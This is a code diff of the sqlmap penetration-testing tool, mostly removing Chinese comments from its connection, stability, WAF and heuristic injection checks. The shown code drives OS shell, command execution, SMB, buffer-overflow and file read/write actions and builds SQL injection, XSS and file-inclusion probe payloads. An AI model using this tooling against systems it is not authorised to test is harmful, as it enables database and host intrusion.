-        for query in conf.sqlQuery.strip(';').split(';'):  # 循环执行每个 SQL 查询语句
+    if conf.sqlQuery:
+        for query in conf.sqlQuery.strip(';').split(';'):
            query = query.strip()
-            if query:  # 如果查询语句不为空
-                conf.dumper.sqlQuery(query, conf.dbmsHandler.sqlQuery(query))  # 打印查询结果
+            if query:
+                conf.dumper.sqlQuery(query, conf.dbmsHandler.sqlQuery(query))

-    if conf.sqlShell:  # 如果需要进入 SQL shell
-        conf.dbmsHandler.sqlShell()  # 进入 SQL shell
+    if conf.sqlShell:
+        conf.dbmsHandler.sqlShell()

-    if conf.sqlFile:  # 如果需要从文件读取 SQL 查询语句
-        conf.dbmsHandler.sqlFile()  # 从文件读取 SQL 查询语句并执行
+    if conf.sqlFile:
+        conf.dbmsHandler.sqlFile()

-    # 用户定义函数选项
-    if conf.udfInject:  # 如果需要注入用户定义函数
-        conf.dbmsHandler.udfInjectCustom()  # 注入用户定义函数
+    # User-defined function options
+    if conf.udfInject:
+        conf.dbmsHandler.udfInjectCustom()

-    # 文件系统选项
-    if conf.fileRead:  # 如果需要读取文件
-        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead))  # 打印读取的文件内容
+    # File system options
+    if conf.fileRead:
+        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead))

-    if conf.fileWrite:  # 如果需要写入文件
-        conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType)  # 写入文件
+    if conf.fileWrite:
+        conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType)

-    if conf.commonFiles:  # 如果需要读取一些常见的文件
+    if conf.commonFiles:
        try:
-            conf.dumper.rFile(fileExists(paths.COMMON_FILES))  # 打印读取的常见文件内容
+            conf.dumper.rFile(fileExists(paths.COMMON_FILES))
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    # 操作系统选项
-    if conf.osCmd:  # 如果需要执行操作系统命令
-        conf.dbmsHandler.osCmd()  # 执行操作系统命令
+    # Operating system options
+    if conf.osCmd:
+        conf.dbmsHandler.osCmd()

-    if conf.osShell:  # 如果需要进入操作系统 shell
-        conf.dbmsHandler.osShell()  # 进入操作系统 shell
+    if conf.osShell:
+        conf.dbmsHandler.osShell()

-    if conf.osPwn:  # 如果需要利用操作系统漏洞
-        conf.dbmsHandler.osPwn()  # 利用操作系统漏洞
+    if conf.osPwn:
+        conf.dbmsHandler.osPwn()

-    if conf.osSmb:  # 如果需要利用 SMB 协议
-        conf.dbmsHandler.osSmb()  # 利用 SMB 协议
+    if conf.osSmb:
+        conf.dbmsHandler.osSmb()

-    if conf.osBof:  # 如果需要利用缓冲区溢出漏洞
-        conf.dbmsHandler.osBof()  # 利用缓冲区溢出漏洞
+    if conf.osBof:
+        conf.dbmsHandler.osBof()

-    # Windows 注册表选项
-    if conf.regRead:  # 如果需要读取注册表值
-        conf.dumper.registerValue(conf.dbmsHandler.regRead())  # 打印读取的注册表值
+    # Windows registry options
+    if conf.regRead:
+        conf.dumper.registerValue(conf.dbmsHandler.regRead())

-    if conf.regAdd:  # 如果需要添加注册表值
-        conf.dbmsHandler.regAdd()  # 添加注册表值
+    if conf.regAdd:
+        conf.dbmsHandler.regAdd()

-    if conf.regDel:  # 如果需要删除注册表值
-        conf.dbmsHandler.regDel()  # 删除注册表值
+    if conf.regDel:
+        conf.dbmsHandler.regDel()

-    # 其他选项
-    if conf.cleanup:  # 如果需要清理数据库中的数据
-        conf.dbmsHandler.cleanup()  # 清理数据库中的数据
+    # Miscellaneous options
+    if conf.cleanup:
+        conf.dbmsHandler.cleanup()

-    if conf.direct:  # 如果使用直接连接模式
-        conf.dbmsConnector.close()  # 关闭数据库连接
+    if conf.direct:
+        conf.dbmsConnector.close()
--- a/src/sqlmap-master/lib/controller/checks.py
+++ b/src/sqlmap-master/lib/controller/checks.py
@ -913,7 +913,6 @@ def checkFalsePositives(injection):

    retVal = True

-    # 如果注入数据中所有元素都在PAYLOAD.TECHNIQUE.BOOLEAN、PAYLOAD.TECHNIQUE.TIME、PAYLOAD.TECHNIQUE.STACKED中，或者注入数据长度为1且PAYLOAD.TECHNIQUE.UNION在注入数据中且"Generic"在注入数据[PAYLOAD.TECHNIQUE.UNION].title中
    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
        pushValue(kb.injection)

@ -921,13 +920,11 @@ def checkFalsePositives(injection):
        infoMsg += "parameter '%s' is a false positive" % injection.parameter
        logger.info(infoMsg)

-        # 定义一个函数，返回一个随机整数
        def _():
            return int(randomInt(2)) + 1

        kb.injection = injection

-        # 遍历配置级别
        for level in xrange(conf.level):
            while True:
                randInt1, randInt2, randInt3 = (_() for j in xrange(3))
@ -935,48 +932,38 @@ def checkFalsePositives(injection):
                randInt1 = min(randInt1, randInt2, randInt3)
                randInt3 = max(randInt1, randInt2, randInt3)

-                # 如果配置字符串存在且配置字符串在任意一个Unicode(_)中
                if conf.string and any(conf.string in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):
                    continue

-                # 如果配置非字符串存在且配置非字符串在任意一个Unicode(_)中
                if conf.notString and any(conf.notString in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):
                    continue

-                # 如果randInt3 > randInt2 > randInt1，则跳出循环
                if randInt3 > randInt2 > randInt1:
                    break

-            # 如果不满足布尔表达式，则retVal为False，跳出循环
            if not checkBooleanExpression("%d%s%d" % (randInt1, INFERENCE_EQUALS_CHAR, randInt1)):
                retVal = False
                break

-            # 如果PAYLOAD.TECHNIQUE.BOOLEAN不在注入数据中，则检查布尔表达式
            if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:
                checkBooleanExpression("%d%s%d" % (randInt1, INFERENCE_EQUALS_CHAR, randInt2))          # just in case if DBMS hasn't properly recovered from previous delayed request

-            # 如果满足布尔表达式，则retVal为False，跳出循环
            if checkBooleanExpression("%d%s%d" % (randInt1, INFERENCE_EQUALS_CHAR, randInt3)):          # this must not be evaluated to True
                retVal = False
                break

-            # 如果满足布尔表达式，则retVal为False，跳出循环
            elif checkBooleanExpression("%d%s%d" % (randInt3, INFERENCE_EQUALS_CHAR, randInt2)):        # this must not be evaluated to True
                retVal = False
                break

-            # 如果不满足布尔表达式，则retVal为False，跳出循环
            elif not checkBooleanExpression("%d%s%d" % (randInt2, INFERENCE_EQUALS_CHAR, randInt2)):    # this must be evaluated to True
                retVal = False
                break

-            # 如果满足布尔表达式，则retVal为False，跳出循环
            elif checkBooleanExpression("%d %d" % (randInt3, randInt2)):                                # this must not be evaluated to True (invalid statement)
                retVal = False
                break

-        # 如果retVal为False，则记录警告信息
        if not retVal:
            warnMsg = "false positive or unexploitable injection point detected"
            logger.warning(warnMsg)
@ -991,28 +978,22 @@ def checkSuhosinPatch(injection):
    Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
    """

-    # 如果注入点在GET或URI中
    if injection.place in (PLACE.GET, PLACE.URI):
        debugMsg = "checking for parameter length "
        debugMsg += "constraining mechanisms"
        logger.debug(debugMsg)

-        # 将当前的注入点保存到栈中
        pushValue(kb.injection)

-        # 设置当前的注入点
        kb.injection = injection
-        # 生成一个随机数
        randInt = randomInt()

-        # 检查参数长度是否被限制
        if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
            warnMsg = "parameter length constraining "
            warnMsg += "mechanism detected (e.g. Suhosin patch). "
            warnMsg += "Potential problems in enumeration phase can be expected"
            logger.warning(warnMsg)

-        # 恢复之前的注入点
        kb.injection = popValue()

@stackedmethod
@ -1020,12 +1001,9 @@ def checkFilteredChars(injection):
    debugMsg = "checking for filtered characters"
    logger.debug(debugMsg)

-    # 将当前的注入点保存到栈中
    pushValue(kb.injection)

-    # 设置当前的注入点
    kb.injection = injection
-    # 生成一个随机数
    randInt = randomInt()

    # all other techniques are already using parentheses in tests
@ -1047,23 +1025,17 @@ def checkFilteredChars(injection):

    kb.injection = popValue()

-# 定义一个函数，用于检查SQL注入
 def heuristicCheckSqlInjection(place, parameter):
-    # 如果配置文件中设置了跳过启发式测试，则返回None
    if conf.skipHeuristics:
        return None

-    # 获取原始值
    origValue = conf.paramDict[place][parameter]
-    # 获取参数类型
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

-    # 定义前缀、后缀和随机字符串
    prefix = ""
    suffix = ""
    randStr = ""

-    # 如果配置文件中设置了前缀或后缀，则获取前缀和后缀
    if conf.prefix or conf.suffix:
        if conf.prefix:
            prefix = conf.prefix
@ -1071,82 +1043,52 @@ def heuristicCheckSqlInjection(place, parameter):
        if conf.suffix:
            suffix = conf.suffix

-    # 生成一个包含一个单引号和一个双引号的随机字符串
    while randStr.count('\'') != 1 or randStr.count('\"') != 1:
        randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)

-    # 设置启发式模式为True
    kb.heuristicMode = True

-    # 构造payload
    payload = "%s%s%s" % (prefix, randStr, suffix)
-    # 使用agent.payload方法构造payload
    payload = agent.payload(place, parameter, newValue=payload)
-    # 发送请求并获取页面和响应码
    page, _, code = Request.queryPage(payload, place, content=True, raise404=False)

-    # 将页面和响应码保存到kb中
    kb.heuristicPage = page
    kb.heuristicCode = code
-    # 设置启发式模式为False
    kb.heuristicMode = False

-    # 解析页面中的文件路径
    parseFilePaths(page)
-    # 判断是否是数据库错误
    result = wasLastResponseDBMSError()

-    # 构造提示信息
    infoMsg = "heuristic (basic) test shows that %sparameter '%s' might " % ("%s " % paramType if paramType != parameter else "", parameter)

-    # 判断page中是否包含FORMAT_EXCEPTION_STRINGS中的任意一个字符串
    def _(page):
        return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)

-    # 判断page中是否包含FORMAT_EXCEPTION_STRINGS中的任意一个字符串，且kb.originalPage中不包含
    casting = _(page) and not _(kb.originalPage)

-    # 如果没有进行类型转换，且result为空，kb.dynamicParameter为真，origValue为数字，且kb.heavilyDynamic为假
    if not casting and not result and kb.dynamicParameter and origValue.isdigit() and not kb.heavilyDynamic:
-        # 生成一个随机整数
        randInt = int(randomInt())
-        # 生成payload
        payload = "%s%s%s" % (prefix, "%d-%d" % (int(origValue) + randInt, randInt), suffix)
-        # 使用agent.payload生成payload
        payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
-        # 使用Request.queryPage查询页面
        result = Request.queryPage(payload, place, raise404=False)

-        # 如果result为空
        if not result:
-            # 生成一个随机字符串
            randStr = randomStr()
-            # 生成payload
            payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
-            # 使用agent.payload生成payload
            payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
-            # 使用Request.queryPage查询页面
            casting = Request.queryPage(payload, place, raise404=False)

-    # 根据casting和result的值，设置kb.heuristicTest的值
    kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE

-    # 如果kb.heavilyDynamic为真
    if kb.heavilyDynamic:
-        # 输出debug信息
        debugMsg = "heuristic check stopped because of heavy dynamicity"
        logger.debug(debugMsg)
-        # 返回kb.heuristicTest的值
        return kb.heuristicTest

-    # 如果casting为真
    if casting:
-        # 输出错误信息
        errMsg = "possible %s casting detected (e.g. '" % ("integer" if origValue.isdigit() else "type")

-        # 获取url的后缀
        platform = conf.url.split('.')[-1].lower()
-        # 根据后缀，输出不同的错误信息
        if platform == WEB_PLATFORM.ASP:
            errMsg += "%s=CInt(request.querystring(\"%s\"))" % (parameter, parameter)
        elif platform == WEB_PLATFORM.ASPX:
@ -1159,68 +1101,45 @@ def heuristicCheckSqlInjection(place, parameter):
        errMsg += "') at the back-end web application"
        logger.error(errMsg)

-        # 如果kb.ignoreCasted为空
        if kb.ignoreCasted is None:
-            # 输出提示信息
            message = "do you want to skip those kind of cases (and save scanning time)? %s " % ("[Y/n]" if conf.multipleTargets else "[y/N]")
-            # 读取用户输入，设置kb.ignoreCasted的值
            kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True)

-    # 如果result为真
    elif result:
-        # 输出信息
        infoMsg += "be injectable"
-        # 如果Backend.getErrorParsedDBMSes()不为空
        if Backend.getErrorParsedDBMSes():
-            # 输出信息
            infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes()
        logger.info(infoMsg)

-    # 如果以上条件都不满足
    else:
-        # 输出警告信息
        infoMsg += "not be injectable"
        logger.warning(infoMsg)

-    # 设置kb.heuristicMode为真
    kb.heuristicMode = True
-    # 设置kb.disableHtmlDecoding为真
    kb.disableHtmlDecoding = True

-    # 生成两个随机字符串
    randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)
-    # 生成value
    value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
-    # 生成payload
    payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
-    # 使用agent.payload生成payload
    payload = agent.payload(place, parameter, newValue=payload)
-    # 使用Request.queryPage查询页面
    page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)

-    # 获取paramType
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

+    # Reference: https://bugs.python.org/issue18183
    if value.upper() in (page or "").upper():
-        # 如果value的大写字母在page的大写字母中，则执行以下代码
        infoMsg = "heuristic (XSS) test shows that %sparameter '%s' might be vulnerable to cross-site scripting (XSS) attacks" % ("%s " % paramType if paramType != parameter else "", parameter)
-        # 输出信息，表示参数可能存在XSS攻击
        logger.info(infoMsg)

        if conf.beep:
-            # 如果配置文件中设置了beep，则执行beep函数
            beep()

    for match in re.finditer(FI_ERROR_REGEX, page or ""):
-        # 在page中查找FI_ERROR_REGEX，如果找到，则执行以下代码
        if randStr1.lower() in match.group(0).lower():
-            # 如果randStr1的小写字母在match.group(0)的小写字母中，则执行以下代码
            infoMsg = "heuristic (FI) test shows that %sparameter '%s' might be vulnerable to file inclusion (FI) attacks" % ("%s " % paramType if paramType != parameter else "", parameter)
-            # 输出信息，表示参数可能存在FI攻击
            logger.info(infoMsg)

            if conf.beep:
-                # 如果配置文件中设置了beep，则执行beep函数
                beep()

            break
@ -1238,7 +1157,6 @@ def checkDynParam(place, parameter, value):
    """

    if kb.choices.redirect:
-        # 如果kb.choices.redirect为True，则返回None
        return None

    kb.matchRatio = None
@ -1248,14 +1166,11 @@ def checkDynParam(place, parameter, value):
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

    infoMsg = "testing if %sparameter '%s' is dynamic" % ("%s " % paramType if paramType != parameter else "", parameter)
-    # 输出信息，表示正在测试参数是否动态
    logger.info(infoMsg)

    try:
        payload = agent.payload(place, parameter, value, getUnicode(randInt))
-        # 生成payload
        dynResult = Request.queryPage(payload, place, raise404=False)
-        # 发送payload，获取结果
    except SqlmapConnectionException:
        pass

@ -1269,51 +1184,40 @@ def checkDynamicContent(firstPage, secondPage):
    This function checks for the dynamic content in the provided pages
    """

-    # 如果没有网络连接，则跳过动态内容检查
    if kb.nullConnection:
        debugMsg = "dynamic content checking skipped "
        debugMsg += "because NULL connection used"
        logger.debug(debugMsg)
        return

-    # 如果没有提供页面内容，则无法检查动态内容
    if any(page is None for page in (firstPage, secondPage)):
        warnMsg = "can't check dynamic content "
        warnMsg += "because of lack of page content"
        logger.critical(warnMsg)
        return

-    # 如果提供了页面内容，并且页面内容长度超过最大长度，则无法计算相似度
    if firstPage and secondPage and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (firstPage, secondPage)):
        ratio = None
    else:
        try:
-            # 获取当前线程的数据
            seqMatcher = getCurrentThreadData().seqMatcher
-            # 设置第一个序列
            seqMatcher.set_seq1(firstPage)
-            # 设置第二个序列
            seqMatcher.set_seq2(secondPage)
-            # 计算相似度
            ratio = seqMatcher.quick_ratio()
        except MemoryError:
            ratio = None

-    # 如果无法计算相似度，则跳过动态内容检查
    if ratio is None:
        kb.skipSeqMatcher = True

    # In case of an intolerable difference turn on dynamicity removal engine
    elif ratio <= UPPER_RATIO_BOUND:
-        # 如果比率小于等于上限比率，则调用findDynamicContent函数
        findDynamicContent(firstPage, secondPage)

        count = 0
-        # 当Request.queryPage()返回False时，循环执行
        while not Request.queryPage():
            count += 1

-            # 如果重试次数超过配置的最大重试次数，则输出警告信息，并将textOnly设置为True
            if count > conf.retries:
                warnMsg = "target URL content appears to be too dynamic. "
                warnMsg += "Switching to '--text-only' "
@ -1322,14 +1226,12 @@ def checkDynamicContent(firstPage, secondPage):
                conf.textOnly = True
                return

-            # 输出警告信息，表示目标URL内容过于动态，sqlmap将重试请求
            warnMsg = "target URL content appears to be heavily dynamic. "
            warnMsg += "sqlmap is going to retry the request(s)"
            singleTimeLogMessage(warnMsg, logging.CRITICAL)

            kb.heavilyDynamic = True

-            # 重新查询页面内容
            secondPage, _, _ = Request.queryPage(content=True)
            findDynamicContent(firstPage, secondPage)

@ -1347,22 +1249,17 @@ def checkStability():
    infoMsg = "testing if the target URL content is stable"
    logger.info(infoMsg)

-    # 获取原始页面内容
    firstPage = kb.originalPage  # set inside checkConnection()

-    # 计算延迟时间
    delay = MAX_STABILITY_DELAY - (time.time() - (kb.originalPageTime or 0))
    delay = max(0, min(MAX_STABILITY_DELAY, delay))
    time.sleep(delay)

-    # 重新查询页面内容
    secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)

-    # 如果存在重定向，则返回None
    if kb.choices.redirect:
        return None

-    # 比较两个页面内容是否相同
    kb.pageStable = (firstPage == secondPage)

    if kb.pageStable:
@ -1384,7 +1281,6 @@ def checkStability():
        warnMsg += "'Page comparison'"
        logger.warning(warnMsg)

-        # 提示用户如何继续
        message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
        choice = readInput(message, default='C').upper()

@ -1392,7 +1288,6 @@ def checkStability():
            raise SqlmapUserQuitException

        elif choice == 'S':
-            # 如果用户选择字符串匹配，则调用showStaticWords函数
            showStaticWords(firstPage, secondPage)

            message = "please enter value for parameter 'string': "
@ -1412,7 +1307,6 @@ def checkStability():
                raise SqlmapNoneDataException(errMsg)

        elif choice == 'R':
-            # 如果用户选择正则表达式匹配，则提示用户输入正则表达式
            message = "please enter value for parameter 'regex': "
            regex = readInput(message)

@ -1430,7 +1324,6 @@ def checkStability():
                raise SqlmapNoneDataException(errMsg)

        else:
-            # 如果用户选择继续，则调用checkDynamicContent函数
            checkDynamicContent(firstPage, secondPage)

    return kb.pageStable
@ -1441,15 +1334,12 @@ def checkWaf():
    Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
    """

-    # 如果配置中存在字符串匹配、不匹配、正则表达式匹配、假数据、离线模式或跳过WAF检测，则返回None
    if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):
        return None

-    # 如果原始HTTP状态码为404，则返回None
    if kb.originalCode == _http_client.NOT_FOUND:
        return None

-    # 从哈希数据库中获取WAF检测结果
    _ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True)
    if _ is not None:
        if _:
@ -1458,7 +1348,6 @@ def checkWaf():
            logger.critical(warnMsg)
        return _

-    # 如果原始页面内容为空，则返回None
    if not kb.originalPage:
        return None

@ -1467,44 +1356,36 @@ def checkWaf():
    logger.info(infoMsg)

    retVal = False
-    # 生成随机payload
    payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)

    place = PLACE.GET
-    # 如果URI参数存在，则将payload添加到URI参数中
    if PLACE.URI in conf.parameters:
        value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
    else:
        value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
        value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))

-    # 保存当前状态
    pushValue(kb.choices.redirect)
    pushValue(kb.resendPostOnRedirect)
    pushValue(conf.timeout)

-    # 设置重定向为True，重发POST请求为False，超时时间为IPS_WAF_CHECK_TIMEOUT
    kb.choices.redirect = REDIRECTION.YES
    kb.resendPostOnRedirect = False
    conf.timeout = IPS_WAF_CHECK_TIMEOUT

    try:
-        # 查询页面内容，并比较比率
        retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO
    except SqlmapConnectionException:
        retVal = True
    finally:
        kb.matchRatio = None

-        # 恢复之前的状态
        conf.timeout = popValue()
        kb.resendPostOnRedirect = popValue()
        kb.choices.redirect = popValue()

-    # 将WAF检测结果写入哈希数据库
    hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True)

-    # 如果检测到WAF，则输出警告信息，并提示用户是否继续
    if retVal:
        if not kb.identifiedWafs:
            warnMsg = "heuristics detected that the target "
@ -1530,11 +1411,9 @@ def checkNullConnection():
    Reference: http://www.wisec.it/sectou.php?id=472f952d79293
    """

-    # 如果存在POST数据，则返回False
    if conf.data:
        return False

-    # 从哈希数据库中获取NULL连接检测结果
    _ = hashDBRetrieve(HASHDB_KEYS.CHECK_NULL_CONNECTION_RESULT, True)
    if _ is not None:
        kb.nullConnection = _
@ -1547,12 +1426,10 @@ def checkNullConnection():
        infoMsg = "testing NULL connection to the target URL"
        logger.info(infoMsg)

-        # 保存当前状态
        pushValue(kb.pageCompress)
        kb.pageCompress = False

        try:
-            # 使用HEAD方法测试NULL连接
            page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)

            if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
@ -1561,7 +1438,6 @@ def checkNullConnection():
                infoMsg = "NULL connection is supported with HEAD method ('Content-Length')"
                logger.info(infoMsg)
            else:
-                # 使用GET方法测试NULL连接
                page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})

                if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
@ -1570,7 +1446,6 @@ def checkNullConnection():
                    infoMsg = "NULL connection is supported with GET method ('Range')"
                    logger.info(infoMsg)
                else:
-                    # 使用skip-read方法测试NULL连接
                    _, headers, _ = Request.getPage(skipRead=True)

                    if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
@ -1590,48 +1465,36 @@ def checkNullConnection():
    return kb.nullConnection in getPublicTypeMembers(NULLCONNECTION, True)

 def checkConnection(suppressOutput=False):
-    # 获取当前线程数据
    threadData = getCurrentThreadData()

-    # 检查主机名是否为IP地址
    if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname):
-        # 如果没有代理、Tor、Dummy或离线模式
        if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
            try:
-                # 解析主机名
                debugMsg = "resolving hostname '%s'" % conf.hostname
                logger.debug(debugMsg)
                socket.getaddrinfo(conf.hostname, None)
            except socket.gaierror:
-                # 主机名不存在
                errMsg = "host '%s' does not exist" % conf.hostname
                raise SqlmapConnectionException(errMsg)
            except socket.error as ex:
-                # 解析主机名时出现问题
                errMsg = "problem occurred while "
                errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
                raise SqlmapConnectionException(errMsg)
            except UnicodeError as ex:
-                # 处理主机名时出现问题
                errMsg = "problem occurred while "
                errMsg += "handling a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
                raise SqlmapDataException(errMsg)

-    # 如果没有抑制输出，并且不是Dummy或离线模式
    if not suppressOutput and not conf.dummy and not conf.offline:
-        # 测试连接到目标URL
        infoMsg = "testing connection to the target URL"
        logger.info(infoMsg)

    try:
-        # 获取页面内容
        kb.originalPageTime = time.time()
        page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)

-        # 获取原始响应
        rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)

-        # 如果提供了字符串，检查字符串是否在页面内容中
        if conf.string:
            infoMsg = "testing if the provided string is within the "
            infoMsg += "target URL page content"
@ -1643,7 +1506,6 @@ def checkConnection(suppressOutput=False):
                warnMsg += "URL raw response, sqlmap will carry on anyway"
                logger.warning(warnMsg)

-        # 如果提供了正则表达式，检查正则表达式是否匹配页面内容
        if conf.regexp:
            infoMsg = "testing if the provided regular expression matches within "
            infoMsg += "the target URL page content"
@ -1657,25 +1519,19 @@ def checkConnection(suppressOutput=False):

        kb.errorIsNone = False

-        # 如果服务器头包含不兼容的服务器，关闭预连接机制
        if any(_ in (kb.serverHeader or "") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):
            singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % kb.serverHeader)
            conf.disablePrecon = True

-        # 如果没有原始页面，并且最后一个响应是HTTP错误
        if not kb.originalPage and wasLastResponseHTTPError():
-            # 如果最后一个请求的HTTP错误代码不在忽略代码中
            if getLastRequestHTTPError() not in (conf.ignoreCode or []):
                errMsg = "unable to retrieve page content"
                raise SqlmapConnectionException(errMsg)
-        # 如果最后一个响应是DBMS错误
        elif wasLastResponseDBMSError():
            warnMsg = "there is a DBMS error found in the HTTP response body "
            warnMsg += "which could interfere with the results of the tests"
            logger.warning(warnMsg)
-        # 如果最后一个响应是HTTP错误
        elif wasLastResponseHTTPError():
-            # 如果最后一个请求的HTTP错误代码不在忽略代码中
            if getLastRequestHTTPError() not in (conf.ignoreCode or []):
                warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
                warnMsg += "which could interfere with the results of the tests"
@ -1683,20 +1539,14 @@ def checkConnection(suppressOutput=False):
        else:
            kb.errorIsNone = True

-        # 如果重定向为是，并且最后一个重定向URL和最后一个请求UID相同
        if kb.choices.redirect == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
-            # 如果最后一个重定向URL以https://开头，并且主机名在最后一个重定向URL中
            if (threadData.lastRedirectURL[1] or "").startswith("https://") and conf.hostname in getUnicode(threadData.lastRedirectURL[1]):
-                # 将URL改为https://
                conf.url = re.sub(r"https?://", "https://", conf.url)
-                # 获取端口号
                match = re.search(r":(\d+)", threadData.lastRedirectURL[1])
                port = match.group(1) if match else 443
-                # 将URL中的端口号改为最后一个重定向URL中的端口号
                conf.url = re.sub(r":\d+(/|\Z)", r":%s\g<1>" % port, conf.url)

    except SqlmapConnectionException as ex:
-        # 如果提供了IPv6地址，检查连接
        if conf.ipv6:
            warnMsg = "check connection to a provided "
            warnMsg += "IPv6 address with a tool like ping6 "
@ -1705,16 +1555,13 @@ def checkConnection(suppressOutput=False):
            warnMsg += "any addressing issues"
            singleTimeWarnMessage(warnMsg)

-        # 如果HTTP错误代码为404
        if any(code in kb.httpErrorCodes for code in (_http_client.NOT_FOUND, )):
            errMsg = getSafeExString(ex)
            logger.critical(errMsg)

-            # 如果有多个目标
            if conf.multipleTargets:
                return False

-            # 提示用户是否退出
            msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] "
            if readInput(msg, default='Y', boolean=True):
                raise SqlmapSilentQuitException
@ -1723,16 +1570,12 @@ def checkConnection(suppressOutput=False):
        else:
            raise
    finally:
-        # 将原始页面和页面模板设置为最后一个页面和最后一个代码
        kb.originalPage = kb.pageTemplate = threadData.lastPage
        kb.originalCode = threadData.lastCode

-    # 如果提供了cookie，并且没有声明cookie，也没有在httpHeaders中声明cookie，也没有设置dropSetCookie
    if conf.cj and not conf.cookie and not any(_[0] == HTTP_HEADER.COOKIE for _ in conf.httpHeaders) and not conf.dropSetCookie:
-        # 获取cookie
        candidate = DEFAULT_COOKIE_DELIMITER.join("%s=%s" % (_.name, _.value) for _ in conf.cj)

-        # 提示用户是否使用这些cookie
        message = "you have not declared cookie(s), while "
        message += "server wants to set its own ('%s'). " % re.sub(r"(=[^=;]{10}[^=;])[^=;]+([^=;]{10})", r"\g<1>...\g<2>", candidate)
        message += "Do you want to use those [Y/n] "
@ -1742,11 +1585,8 @@ def checkConnection(suppressOutput=False):

    return True

-# 检查网络连接
 def checkInternet():
-    # 获取页面内容
    content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
-    # 判断页面内容是否包含指定的值
    return CHECK_INTERNET_VALUE in (content or "")

 def setVerbosity():  # Cross-referenced function
--- a/src/sqlmap-master/lib/controller/controller.py
+++ b/src/sqlmap-master/lib/controller/controller.py
@ -86,71 +86,55 @@ def _selectInjection():

    points = {}

-    # 遍历kb.injections中的每一个injection
    for injection in kb.injections:
        place = injection.place
        parameter = injection.parameter
        ptype = injection.ptype

-        # 将place, parameter, ptype组成一个元组point
        point = (place, parameter, ptype)

-        # 如果point不在points中，则将injection添加到points中
        if point not in points:
            points[point] = injection
        else:
-            # 如果point已经在points中，则将injection中的非data字段添加到points中
            for key in points[point]:
                if key != 'data':
                    points[point][key] = points[point][key] or injection[key]
-            # 将injection中的data字段更新到points中
            points[point]['data'].update(injection['data'])

-    # 如果points中只有一个injection，则将kb.injection设置为kb.injections[0]
    if len(points) == 1:
        kb.injection = kb.injections[0]

-    # 如果points中有多个injection，则提示用户选择一个injection
    elif len(points) > 1:
